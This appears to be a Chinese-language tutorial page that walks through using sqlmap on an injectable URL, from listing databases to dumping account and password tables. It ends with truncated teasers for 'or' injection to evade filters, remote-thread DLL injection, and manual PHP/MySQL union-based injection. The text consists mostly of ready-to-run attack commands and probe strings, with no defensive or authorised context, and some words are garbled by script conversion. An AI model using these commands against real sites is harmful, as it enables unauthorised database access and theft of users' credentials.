一次sqlmap注入點並且dump出賬號密碼全程
判斷注入點:sqlmap.py -u 「存在注入url」
爆出所有資料庫名字:sqlmap.py -u 「存在注入url」 --dbs
檢視當前使用賬號:sqlmap.py -u 「存在注入url」 --current-user
1、檢視當前資料庫:sqlmap.py -u 「存在注入url」 --current-db
2、列出資料庫中所有表:sqlmap.py -u 「存在注入url」-d 「當前資料庫名」 --tables。解釋說明:-d是指定資料庫名稱。
3、列出資料庫中的表中的字段:sqlmap.py -u 「存在注入url」 -d 「當前資料庫名」 -t 「資料庫中的隨意一張表(選取表需要自己判斷)」 --columns。
4、列出資料庫中的表中的字段:sqlmap.py -u 「存在注入url」 -d 「當前資料庫名」 -t 「資料庫中的隨意一張表(選取表需要自己判斷)」 -c 「當前表的字段」 --dump。
以上就是基礎sql注入簡單教程,每一步有異曲同工之處,不管是什麼方式的注入他們的方法都不會變。
新or注入教程
記得一年前火狐有一位朋友問,如果乙個站過濾了and和 的話,改怎麼注入啊?當時我隨口說了句 or注入 後來又一次看貼的時候,看到他問我該怎麼利用呢?我就寫了幾個簡單的語句給他,叫他自己變換,他很感激我,還說網上沒有這種方法。我到網上查了查,還真沒有or注入專題呢 or 1 1除外 呵呵,所以,一年後...
程式注入教程集合
遠端執行緒注入dll 遠執行緒注入原理是利用windows 系統中createremotethread 這個api,其中第4個引數是準備執行的執行緒,我們可以將loadlibrary 填入其中,這樣就可以執行遠端程序中的loadlibrary 函式,進而將我們自己準備的dll載入到遠端程序空間中執行...
php mysql手工注入教程
注入點 x and1 1 返回正確 and1 2返回錯誤 說明存在注入點 order by 11 反悔正確 order by 12 返回錯誤 說明存在11個字段 union select 1,2,3,4,5,6,7,8,9,10,11 看清楚那裡是 13 是讓他報錯用的 也可以用and 1 2 報錯...